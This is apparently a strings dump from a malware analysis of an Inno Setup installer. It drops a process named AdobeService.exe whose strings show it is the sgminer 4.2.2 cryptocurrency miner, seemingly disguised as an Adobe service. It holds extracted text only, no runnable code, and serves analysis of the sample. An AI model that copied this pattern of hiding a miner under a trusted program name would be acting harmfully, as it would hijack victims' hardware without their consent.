Windows NT
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.1.ee2 (u)
Portions Copyright (C) 2000-2012 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
hXXp://restools.hanzify.org/
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
crSQLWait
%s (%s)
imm32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Out Of Stack Range Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d<MultiLine must be True when TabPosition is tpLeft or tpRight
Invalid item level assignment Invalid level (%d) for item "%s"
Invalid owner %s is already associated with %sE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
LError loading dock zone from the stream. Expecting version %d, but found %d.,Multiselect mode must be on for this feature
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"PageControl must first be assigned#No context-sensitive help installed
No help found for %s
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s property out of range
Unsupported clipboard format
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and <= %d[Invalid UTF32 character value. Must be >= 0 and <= $10FFF, excluding surrogate pair rangesrHigh surrogate char without a following low surrogate char at index: %d. Check that the string is encoded properlyrLow surrogate char without a preceding high surrogate char at index: %d. Check that the string is encoded properly
''%s'' is not a valid date#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0
msvs.exe_532:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP/1.1 200 OK
HTTP/1.0 200 OK
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
GetCPInfo
wsock32.dll
netapi32.dll
KWindows
Invalid variant operation
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
1.424.56.3248
1.1.0.0
AdobeService.exe_632:
.text
P`.data
.rdata
`@.bss
.idata
u,SShh
uPSSh
v%SWh
VSSSh
XSShDPQ
PPSh.uQ
.PPj.V
%UUUU
UUUU%UUUU
3333333
SShPnU
libgcj_s.dll
Failed to open fd %u for share log
Failed to open %s for share log
%d:%d
%d-%d
Invalid value passed to set temp cutoff
WTF No pool %d found!
Failed to open %s for log-file
set_devices(%s)
Invalid value passed to set devices
set_devices(%s) done.
%.3g%s
%*.*f%s
Diff zero passed to set_target
Generated target %s
[%d-d-d d:d:d]
stratum tcp://
JSON key '%s' not found
JSON key '%s' is not a string
%d/Miner
Invalid value passed to set difficulty multiplier
Setting switcher mode to %s
Coin %.0f Diff %s/%s%s
lx Diff %s/%s%s
WTF RDLOCK ERROR ON LOCK! errno=%d in %s %s():%d
WTF RWLOCK ERROR ON UNLOCK! errno=%d in %s %s():%d
Started at %s
Pool: %s
Runtime: %d hrs : %d mins : %d secs
Average hashrate: %.1f %shash/s
Solved blocks: %d
Best share difficulty: %s
Share submissions: %d
Accepted shares: %d
Rejected shares: %d
Accepted difficulty shares: %1.f
Rejected difficulty shares: %1.f
Hardware errors: %d
Stale submissions discarded due to new blocks: %d
Unable to get work from server occasions: %d
Work items generated locally: %d
Submitting work remotely delay occasions: %d
New blocks detected on network: %d
SOLVED %d BLOCK%s!
Share submissions: %d
Accepted shares: %d
Rejected shares: %d
Accepted difficulty shares: %1.f
Rejected difficulty shares: %1.f
Items worked on: %d
Stale submissions discarded due to new blocks: %d
Unable to get work from server occasions: %d
Submitting work remotely delay occasions: %d
Mined %.0f accepted shares of %d requested
WARNING - Mined only %.0f shares of %d requested.
tailsprintf buffer overflow in %s %s line %d
Failed to malloc userpass
%s:%s
Failed to calloc in recruit_curl
Failed to init in recruit_curl
(%ds):%s (avg):%sh/s | A:%.0f R:%.0f HW:%d WU:%.3f/m
hXXp://
hXXps://
Failed to malloc httpinput
WTF MUTEX ERROR ON UNLOCK! errno=%d in %s %s():%d
Failed to pthread_mutex_init errno=%d in %s %s():%d
Failed to pthread_rwlock_init errno=%d in %s %s():%d
No semicolon separated quota;URL pair found
No parameter for URL found
Setting %s to quota %d
Setting pool %i description to %s
Setting pool %i priority to %s
Disable extranonce subscribe on %d
Setting pool %s state to %s
Setting pool %i profile to %s
Setting pool %i name to %s
Setting pool %i N-factor to %s
Setting pool %i algorithm to %s
Waiting for thread %d to finish...
Attempting to restart %s
WTF WRLOCK ERROR ON LOCK! errno=%d in %s %s():%d
WTF MUTEX ERROR ON LOCK! errno=%d in %s %s():%d
%s%d: invalid nonce - HW error
Shutting down thread %d
Failed to calloc mining_thr[%d]
Assign threads for device %d
Thread %d set pool = %d (%s)
thread_prepare failed for thread %d
Starting device %d mining thread %d...
thread %d create failed
Pushing sem post to thread %d
Recruited curl for %s
%lu,%s,%s,%s,%s%u,%u,%s,%s
Cleared %d work items due to stratum disconnect on pool %d
Lost %d shares due to stratum disconnect on %s
[thread %d: %I64u hashes, %.1f khash/sec]
%s(%ds):%s (avg):%sh/s | A:%.0f R:%.0f HW:%d WU:%.3f/m
Discarded %d stales that didn't match current hash
No settings change from pool %s...
Applying pool settings for %s...
Hard reset: Exiting mining thread %d
Get work blocked for %d seconds
Got work from get queue to get work for thread %d
work prepare failed, exiting mining thread %d
Driver %s working diff changed to %.0f
%s %d failure, disabling!
Thread %d being disabled
Thread %d being re-enabled
sgminer 4.2.2 - Started: %s
- [%u day%c d:d:d]
ST: %d SS: %d NB: %d LW: %d GF: %d RF: %d
Connected to multiple pools %s block change notify
Connected to %s (%s) diff %s as user %s
Block: %s... Diff:%s Started: %s Best share: %s
%s %*d:
/%6sh/s | R:%*.1f%% HW:%*d WU:%*.3f/m
Pausing execution as per stop time d:d scheduled
Terminating execution as planned
Will restart execution as scheduled at d:d
Restarting execution as per start time d:d scheduled
Will pause execution as scheduled at d:d
%.1f C F: %d%%(%dRPM) E: %dMHz M: %dMhz V: %.3fV A: %d%% P: %d%%
%s: Recovered, declaring WELL!
%s: Idle for more than 2 minutes, declaring SICK!
%s: Attempting to restart
%s: Not responded for more than 10 minutes, declaring DEAD!
Password
Generated stratum merkle %s
Generated stratum header %s
Work job_id %s nonce2 %I64u ntime %s
Network diff set to %s
Deleted block %d from database
[d:d:d]
New block: %s... diff %s
Stratum from %s detected new block
%sLONGPOLL from %s detected new block
Stale data from %s
%s now up to date
Stratum from %s requested work restart
%sLONGPOLL from %s requested work restart
Pushing work from %s to hash queue
Switching to %s
Startup GPU initialization... Using settings from pool %s.
Startup Pool No = %d
Set GPU %d to %s
%s Quota %d Prio %d '%s' User:%s
Current pool management strategy: %s
Set to rotate every %d minutes
[F]ailover only %s
Or press any other key to continue
%d: %s
%s own long-poll support
Queued work requests: %d
Discarded work due to new blocks: %d
[D]ebug: %s
[P]er-device: %s
[Q]uiet: %s
[V]erbose: %s
[R]PC debug: %s
[W]orkTime details: %s
[I]ncognito: %s
co[M]pact: %s
[L]og interval: %d
Select an option or any other key to return
Quiet mode %s
Verbose mode %s
Debug mode %s
Incognito mode %s
Compact mode %s
Per-device stats %s
RPC protocol debugging %s
Log interval set to %d seconds
WorkTime details %s
[Q]ueue: %d
[S]cantime: %d
[E]xpiry: %d
Config filename to write (Enter for default) [%s]
%s not responding!
%s failed to return work
Accepted %s %s %d at %s %s%s
Accepted %s %s %d %s%s
Successfully mined %d accepted shares as requested and exiting.
Rejecting %s now accepting shares, re-enabling!
Rejected %s %s %d %s%s %s%s
%s rejected %d sequential shares, disabling!
%s share being discarded to minimise memory cache
%s share became stale while retrying submit, discarding
DBG: sending %s submit RPC call: %s
%s communication failure, discarding shares
%s communication failure, caching submissions
%s communication resumed, submitting work
<-lx.lx M:%c D:%1.*f G:d:d:d:%1.3f %s (%1.3f) W:%1.3f (%1.3f) S:%1.3f R:d:d:d
New best share: %s
Found block for %s!
%s %d: Share above target
%s stale share detected, submitting (user)
%s stale share detected, submitting (pool)
%s stale share detected, discarding
Pushing %s work to stratum queue
previousblockhash: %s
target: %s
coinbasetxn: %s
longpollid: %s
expires: %d
version: %d
curtime: %d
submitold: %s
bits: %s
workid: %s
%s: JSON inval data
%s: Calculating midstate locally
%s: JSON inval target
Retrieving block template from %s
Testing %s
CURL initialisation failed
Probing for GBT support
GBT coinbase append support found, switching to GBT protocol
No GBT coinbase append support found, using getwork protocol
Testing %s stratum %s
Successfully retrieved and deciphered work from %s
Successfully retrieved but FAILED to decipher work from %s
%s%s%s
FAILED to retrieve work from %s
%s slow/down or URL or credentials invalid
Switching %s to %s
CURL initialisation failed in update_gbt
Successfully retrieved and updated GBT from %s
Successfully retrieved but FAILED to decipher GBT from %s
FAILED to update GBT from %s
Generated GBT header %s
Work coinbase %s
%s alive, testing stability
%s alive
Failed to curl_global_init
4.2.2
%s %s
Started %s
* using Jansson %s
Loaded configuration file %s
-. %s %d: %s (driver: %s)
-. %s %d (driver: %s)
%d devices listed
Too many values passed to set temp cutoff
No login credentials supplied for %s
Most likely you have input the wrong URL, forgotten to add a port, or have not set up workers
Pool: %d URL: %s User: %s Password: %s
Press any key to exit, or sgminer will try again in 15s.
incorrect total_control_threads (%d) should be 8
Staged work: total (%d) > max (%d), discarding
%s not providing work fast enough
Increasing queue to %d
Selecting %s for work
DBG: sending %s get RPC call: %s
%s json_rpc_call failed on get work, retrying in 5s
Switching to %s - first alive pool
Reaped %d curl%s from %s
%s stable for %d seconds
Stratum connection to %s resumed
%d/Longpoll
No suitable long-poll found for %s
Block change for %s detection via %s stratum
GBT longpoll ID activated for %s
Long-polling activated for %s
Long-polling activated for %s via %s
{"id": 0, "method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append"], "longpollid": "%s"}]}
%d/SStratum
%s asking for inappropriately long nonce2 length %d
{"params": ["%s", "%s", "%s", "%s", "%s"], "id": %d, "method": "mining.submit"}
Submitting share lx to %s
Pool %d stratum share submission lag time %d seconds
%s stratum share submission failure
%d/RStratum
Suspending stratum on %s
Stratum select failed on %s with value %d
Stratum connection to %s interrupted
JSON decode failed(%d): %s
JSON-RPC non method decode failed: %s
Accepted untracked stratum share from %s
Rejected untracked stratum share from %s
Pool %d stratum share result lag time %d seconds
Unknown stratum msg: %s
sgminer 4.2.2
224.0.0.75
API one letter groups G:cmd:cmd[,P:cmd:*...] defining the cmds a groups can use
--api-mcast-port
API Multicast listen port
Allow API (if enabled) to listen on/for any address, default: only 127.0.0.1
--api-port
Port number of miner API
Disable 'client.reconnect' stratum functionality
--pass|--pool-pass|-p
Password for bitcoin JSON-RPC server
quota;URL combination for server with load-balance strategy quotas
Set socks4 proxy (host:port)
--tcp-keepalive
TCP keepalive packet idle time
--url|--pool-url|-o
URL for bitcoin JSON-RPC server
--userpass|--pool-userpass|-O
Username:Password pair for bitcoin JSON-RPC server
See example.conf for an example configuration.
supports_resume
pop_curl_entry
push_curl_entry
reap_curl
%s%s%s%s
0xx
API: unknown2 data type %d ignored
Socket Error: (%d) %s
API: send reply: (%d) '%.10s%s'
API: send select failed (%d)
API: sent all of %d first go
API: sent %d of %d first go
API: sent all of remaining %d (sendc=%d)
API: sent %d of remaining %d (sendc=%d)
API: send (%d:%d) failed: %s
API mcast setsockopt SO_REUSEADDR failed (%s)%s
API mcast bind to port %d failed (%s)%s
API mcast join failed (%s)%s
%s%s-
API mcast failed count=%d (%s) (%d)
API mcast from %s - %s
API mcast request rep=%d (%s) from %s:%d
API mcast request ignored - invalid port (%s)
API mcast request OK port %s=%d
cgm-FTW-%d-%s
API mcast send reply failed (%s) (%d)
API mcast send reply (%s) succeeded (%d) (%d)
API: unknown1 data type %d ignored
MHS %ds
KHS %ds
POOL%d
API: request to gpudisable gpuid %d %s%u
API: request to gpuenable gpuid %d %s%u
API Pushing sem post to thread %d
API not running%s
API invalid group name '%s'
API invalid group name '%c'
API group name can't be '%c'
API duplicate group name '%c'
API not running (no valid IPs specified)%s
API1 initialisation failed (%s)%s
API2 initialisation failed (%s)%s
API bind to port %d failed - trying again in 30sec
API bind to port %d failed (%s)%s
API3 initialisation failed (%s)%s
API running in IP access mode on port %d (%d)
API running in UNRESTRICTED read access mode on port %d (%d)
API running in local read access mode on port %d (%d)
API failed (%s)%s (%d)
API: connection from %s - %s
API: recv failed: %s
API: recv command: (%d) '%s'
OOM cmdsbuf in %s %s():%d
API: access denied to '%s' for '%s' command
API: terminating due to: %s
API unknown command '%s' in group '%c'
Stratum URL
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported
Invalid GPU id %d - range is 0 - %d
GPU %d already enabled
GPU %d already disabled
GPU %d must be restarted first
GPU %d sent enable message
%d Pool(s)
%d GPU(s)
GPU %d set disable flag
GPU %d restart attempted
GPU%d
Missing JSON '%s'
Invalid pool id %d - range is 0 - %d
Switching to pool %d:'%s'
GPU %d does not have ADL
Invalid intensity (%s) - must be 'D' or range 8 - 31
GPU %d set new intensity to %s
Setting GPU %d memoryclock to (%s) reported failure
Setting GPU %d memoryclock to (%s) reported success
Setting GPU %d clock to (%s) reported failure
Setting GPU %d clock to (%s) reported success
Setting GPU %d vddc to (%s) reported failure
Setting GPU %d vddc to (%s) reported success
Setting GPU %d fan to (%s) reported failure
Setting GPU %d fan to (%s) reported success
Can't open or create save file '%s'
Configuration saved to file '%s'
Access denied to '%s' command
Enabling pool %d:'%s'
Duplicate pool specified %d
Disabling pool %d:'%s'
Pool %d:'%s' already enabled
Pool %d:'%s' already disabled
Invalid addpool details '%s'
Reached maximum number of pools (%d)
Added pool '%s'
Cannot remove last pool %d:'%s'
Cannot remove active pool %d:'%s'
Removed pool %d:'%s'
Missing check cmd
Failover-Only set to %s
Set config '%s' to %d
Unknown config '%s'
Invalid number (%d) for '%s' range is 0-9999
Invalid negative number (%d) for '%s'
Set pool '%s' to quota %d'
Missing config value N for '%s,N'
Invalid zero parameter '%s'
Zeroed %s stats with summary
Zeroed %s stats without summary
Multipool strategy changed to '%s'
Invalid multipool strategy %d
%d Profile(s)
Profile '%s' already exists
Added profile '%s'
Profile '%s' doesn't exist
Profile '%s' is the default profile
Profile '%s' is used by a pool
Changed pool %d to profile '%s'
Windows
127.0.0.1
cg@%s
Failed to sem_wait errno=%d cgsem=0x%p in %s %s():%d
Failed to sem_post errno=%d cgsem=0x%p in %s %s():%d
Failed to sem_init ret=%d errno=%d in %s %s():%d
Failed to calloc in %s %s():%d
CONNECT %s:%s HTTP/1.0
CONNECT %s:%s HTTP/1.1
Host: %s:%s
Sending proxy %s:%s - %s
Couldn't read from proxy %s:%s after sending CONNECT
Received from proxy %s:%s - %s
HTTP/1.1 200
HTTP/1.0 200
HTTP Error from proxy %s:%s - %s
Couldn't read HTTP byte from proxy %s:%s
Success negotiating with %s:%s HTTP proxy
getaddrinfo() in socks4_negotiate() returned %i: %s
Invalid IP address specified for socks4 proxy: %s
Bad response from %s:%s SOCKS4 server
%s: Truncating overflowed address '%.*s'
Failed to malloc rpc_proxy in %s %s():%d
HTTP hdr(%s): %s
X-Roll-Ntime expiry set to %d
Failed to malloc in %s %s():%d
Failed to sem_timedwait errno=%d cgsem=0x%p in %s %s():%d
User-Agent: %s
HTTP request failed: %s
JSON-RPC call failed: %s
Proof: %s
Target: %s
TrgVal? %s
Closing socket for stratum %s
Failed to realloc pool sockbuf in %s %s():%d
RECVD: %s
SEND: %s
Write select failed on %s sock
Closing %s socket
getaddrinfo() in setup_stratum_socket() returned %i: %s
Failed to resolve (wrong URL?) %s:%s
Failed to getaddrinfo for %s:%s
Attempting to negotiate with %s:%s SOCKS5 proxy
Bad response from %s:%s SOCKS5 server
Success negotiating with %s:%s SOCKS5 proxy
Unsupported proxy type for %s:%s
Failed to calloc pool sockbuf in %s %s():%d
Failed to connect to stratum on %s:%s
00000000
%s%s%s%s%s%s%s
%s: Failed to convert header to header_bin, got %s
Failed to calloc cb1 in parse_notify in %s %s():%d
Failed to calloc cb2 in parse_notify in %s %s():%d
job_id: %s
prev_hash: %s
coinbase1: %s
coinbase2: %s
bbversion: %s
nbit: %s
ntime: %s
clean: %s
setup_stratum_socket() on %s failed
{"id": %d, "method": "mining.subscribe", "params": []}
{"id": %d, "method": "mining.subscribe", "params": ["sgminer/4.2.2", "%s"]}
{"id": %d, "method": "mining.subscribe", "params": ["sgminer/4.2.2"]}
Stratum Error: %s
mining.notify
Failed to calloc pool->nonce1bin in %s %s():%d
%s stratum session id: %s
%s confirmed mining.subscribe with extranonce1 %s extran2size %d
Initiating stratum failed on %s
Restarting stratum on pool %s
JSON-RPC method decode failed: %s
mining.set_difficulty
%s difficulty changed to %d
%s difficulty changed to %.3f
%s difficulty set to %f
mining.set_extranonce
%s extranonce change requested
client.reconnect
Stratum client.reconnect received but is disabled, not reconnecting.
Reconnect requested from %s to %s
client.get_version
{"id": %d, "result": "sgminer/4.2.2", "error": null}
client.show_message
%s message: %s
{"id": %d, "method": "mining.authorize", "params": ["%s", "%s"]}
%s JSON stratum auth failed: %s
Stratum authorisation success for %s
{"id": %d, "method": "mining.extranonce.subscribe", "params": []}
Timed out waiting for response extranonce.subscribe
Method 'subscribe' not found for service 'mining.extranonce'
Cannot subscribe to mining.extranonce on %s
Stratum extranonce subscribe for %s
0123456789abcdefhttp:
http0:
Log date is now %d-d-d
[%d-d-d d:d:d]
[d:d:d]
Error %d: Enqueueing kernel onto command queue. (clEnqueueNDRangeKernel)
Error: clEnqueueReadBuffer failed error %d. (clEnqueueReadBuffer)
GPU %d found something?
Failed to init GPU thread %d, disabling device %d
initCl() finished. Found %s
rI:=
xI:=
I:-
MRPM
=%%
Invalid value passed to set raw intensity
Invalid value passed to set shader-based intensity
Invalid value passed to set shader based intensity
Invalid value passed to set temp target
Invalid value passed to set temp overheat
Invalid value passed to set_gpu_powertune
Invalid value passed to set_gpu_memdiff
Invalid value passed to set_gpu_memclock
Invalid value passed to set_gpu_threads
Invalid value passed to set_worksize
Invalid value passed to set_vector
Invalid value passed to set_gpu_vddc
Invalid value passed to set_gpu_fan
Invalid value passed to set_gpu_engine
Invalid value passed to set_gpu_map
Invalid value passed to set intensity
Hardware not reporting same number of active devices, will not attempt to restart GPU
Thread %d still exists, killing it off
Thread %d no longer exists
Reinit GPU thread %d
Failed to reinit GPU thread %d
Thread %d restarted
GPU %d: %.1f / %.1f %sh/s | A:%d R:%d HW:%d U:%.2f/m I:%d xI:%d rI:%d
(%d RPM)
E: %d MHz
M: %d Mhz
A: %d%%
P: %d%%
Last initialised: %s
Thread %d: %.1f %sh/s %s
SICK reported in %s
DEAD reported in %s
[E]nable [D]isable [R]estart GPU %s
Dynamic mode enabled on gpu %d
Intensity on gpu %d set to %d
Experimental intensity on gpu %d set to %d
Raw intensity on gpu %d set to %d
Attempting to restart threads of GPU %d
zDError %d: clGetPlatformsIDs failed (no OpenCL SDK installed?)
Error %d: Getting Platform Ids. (clGetPlatformsIDs)
Error %d: Getting Platform Info. (clGetPlatformInfo)
CL Platform vendor: %s
CL Platform name: %s
CL Platform version: %s
Error %d: Getting Device IDs (num)
Platform devices: %d
Error %d: Getting Device IDs (list)
Error %d: Getting Device Info
Selected %i: %s
Error %d: Creating Context. (clCreateContextFromType)
Error %d: Creating Command Queue. (clCreateCommandQueue)
Error %d: Failed to clGetDeviceInfo when trying to get CL_DEVICE_PREFERRED_VECTOR_WIDTH_INT
Preferred vector width reported %d
Error %d: Failed to clGetDeviceInfo when trying to get CL_DEVICE_MAX_WORK_GROUP_SIZE
Max work group size reported %d
Error %d: Failed to clGetDeviceInfo when trying to get CL_DEVICE_MAX_COMPUTE_UNITS
Max shaders calculated %d
Error %d: Failed to clGetDeviceInfo when trying to get CL_DEVICE_MAX_MEM_ALLOC_SIZE
%s.cl
GPU %d: selecting lookup gap of 2
Kernel zuikkis only supports lookup-gap = 2 (currently %d), forcing.
Kernel bufius only supports lookup-gap of 2, 4 or 8 (currently %d), forcing to 2
GPU %d: selecting thread concurrency of %d
Building binary %s
Initialising kernel %s with%s bitalign, %spatched BFI, nfactor %d, n %d
Error %d: Creating Kernel from program. (clCreateKernel)
Error %d: Creating ExtraKernel #%d from program. (clCreateKernel)
Maximum buffer memory device %d supports says %lu
Error %d: clCreateBuffer (padbuffer8), decrease TC or increase LG
Error %d: clCreateBuffer (CLbuffer0)
Error %d: clCreateBuffer (outputBuffer)
%s%d: invalid nonce count - HW error
OCL NONCE %u found in slot %d
Function not supported by the driver
Get fanrange not supported
Target temperature: %d
Overheat temperature: %d
Cutoff temperature: %d
Fan autotune is now %s
GPU engine clock autotune is now %s
Enter overheat temperature for this GPU in C (%d )
Enter cutoff temperature for this GPU in C (%d )
Set powertune not supported
Set fanspeed not supported
GPU %d doesn't support rpm or percent write
GPU %d call to fanspeed get failed
Overheat detected on GPU %d, increasing fan to 100%%
Temperature %d degrees below target, decreasing fanspeed
Temperature climbed %d while below target, increasing fanspeed
Setting GPU %d fan percentage to %d
Set vddc not supported
Set memoryclock not supported
Number of ADL devices: %d
atiadlxx.dll
atiadlxy.dll
ADL initialisation error: %d (%s)
ADL refresh error: %d (%s)
Cannot get the number of adapters! Error %d!
ADL_Adapter_AdapterInfo_Get Error! Error %d
Found %d logical ADL adapters
ADL index %d, id %d - FAILED to get BIOS info
ADL index %d, id %d - BIOS partno.: %s, version: %s, date: %s
Failed to ADL_Adapter_ID_Get. Error %d
GPU %d assigned: iAdapterIndex:%d iPresent:%d strUDID:%s iBusNumber:%d iDeviceNumber:%d iFunctionNumber:%d iVendorID:%d name:%s
There is possibly at least one GPU that doesn't support OpenCL
Mapping OpenCL device %d to ADL device %d
Mapping device %d to GPU %d according to Bus Number order
GPU %d %s hardware monitoring enabled
ADL GPU %d is Adapter index %d and maps to adapter id %d
GPU %d BIOS partno.: %s, version: %s, date: %s
Setting GPU %d engine clock to %d
Setting GPU %d memory clock to %d
Setting GPU %d voltage to %.3f
Dual GPUs detected: %d and %d
Set engineclock not supported
Hit thermal cutoff limit on GPU %d, disabling!
Overheat detected, decreasing GPU %d clock speed
Temperature %d degrees over target, decreasing clock speed
(%d RPM)
Engine Clock: %d MHz
Memory Clock: %d Mhz
Activity: %d%%
Powertune: %d%%
Fan autotune is %s (%d-%d)
GPU engine clock autotune is %s (%d-%d)
Get enginerange not supported
Enter GPU engine clock speed (%d - %d Mhz)
Driver reports success but check values below
Enter fan percentage (%d - %d %%)
Get memoryrange not supported
Enter GPU memory clock speed (%d - %d Mhz)
Get vddcrange not supported
Failed to set GPU clock to %d MHz. Trying again...
Failed to set GPU clock to %d MHz. Ultratune Aborted.
Failed to set MEM clock to %d MHz. Trying again...
Failed to set MEM clock to %d MHz. Ultratune Aborted.
Ultratune Clocks: GPU: %d MHz, MEM: %d
, Score: %.1f%sh/s, Ratio: %.3f
Best Settings (so far): GPU = %d MHz, MEM = %d MHz, Score = %.1f%sh
Best Settings: GPU = %d MHz, MEM = %d MHz, Score: %.1f%sh, Ratio: %.3f
Failed to set GPU engine clock to %d MHz. Ultratune Aborted.
Failed to set MEM engine clock to %d MHz. Ultratune Aborted.
Ultratune Finished. Write down the above values then press any key.
Algorithm %s not found, using %s.
-D SPH_HAMSI_EXPAND_BIG=%d -D SPH_HAMSI_SHORT=%d
big%u%s
-D LOOKUP_GAP=%d -D CONCURRENT_THREADS=%u -D NFACTOR=%d
lg%utc%unf%u
Loading settings from profile "%s" for pool %i
Profile load failed for pool %i: profile %s not found. Using default profile.
Pool %i Algorithm set to "%s"
Pool %i devices set to "%s"
Pool %i lookup gap set to "%s"
Pool %i Intensity set to "%s"
Pool %i XIntensity set to "%s"
Pool %i Raw Intensity set to "%s"
Pool %i Thread Concurrency set to "%s"
Pool %i GPU Clock set to "%s"
Pool %i GPU Memory clock set to "%s"
Pool %i GPU Threads set to "%s"
Pool %i GPU Fan set to "%s"
Pool %i GPU Powertune set to "%s"
Pool %i GPU Vddc set to "%s"
Pool %i Shaders set to "%s"
Pool %i Worksize set to "%s"
default_profile.name is %s
Could not load default profile %s
Setting profile %s N-factor to %s
Set algorithm N-factor to %d (N to %d)
Set default algorithm to %s
Default Devices = %s
Setting profile %i name to %s
PTF://
Fetch remote file failed: Invalid URL
Fetch remote file failed: curl init failed.
https
Fetch remote file failed: %s
%s: file not found.
Error: JSON decode of file "%s" failed:
--%s%s%s
Skipping config option %s: %s
Error parsing JSON option %s: %s
json_object_set() failed on pool(%d):%s
json_object_set() failed on profile(%d):%s
json_object_set() failed on %s
json_object() failed on profile %d
json_array_append() failed on profile %d
json_object() failed on pool %d
%s%s%s%d;%s
json_array_append() failed on pool %d
%s%s%d
sgminer.conf
Marker "%s" not found
At %p (%u rem. bytes), to begin patching
Error %d: Getting program info CL_PROGRAM_NUM_DEVICES. (clGetProgramInfo)
Error %d: Getting program info CL_PROGRAM_BINARY_SIZES. (clGetProgramInfo)
Error %d: Getting program info. CL_PROGRAM_BINARIES (clGetProgramInfo)
Binary size found in binary slot %d: %d
Could not patch BFI_INT, please report this issue.
Unable to create file %s
%s/%s
Trying to open %s...
%s/kernel/%s
Unable to open %s for reading!
Using %s
Error %d: Loading Binary into cl_program (clCreateProgramWithSource)
CompilerOptions: %s
Error %d: Building Program (clBuildProgram)
-I "%s" -I "%s/kernel" -I "." -D WORKSIZE=%d
Setting worksize to %d
w%dl%d
Error %d: Loading Binary into cl_program (clCreateProgramWithBinary)
Loaded binary image %s
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
NUL byte in object key not supported
duplicate object key
unable to open %s: %s
\uX
\uX\uX
advapi32.dll
Invalid argument '%s'
Option %s: unknown entry type %u
Option %s: description cannot be NULL
Option %s: does not begin with '-'
Option %s: invalid long option '--'
Option %s: invalid short option '%.*s'
Option %s: does not take arguments '%s'
Usage: %s
(default: %s)
'%s' is not a number
'%s' is out of range
'%s' is negative
value '%s' does not fit into an integer
%s: %.*s: %s
#"! '&%$ *)(/.-,32107654;:98?>=<
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
t44Fr.rh.66Aw-wl-
..eK9K\9
.44Fr.rh-66Aw-wl
9..eK9K\W
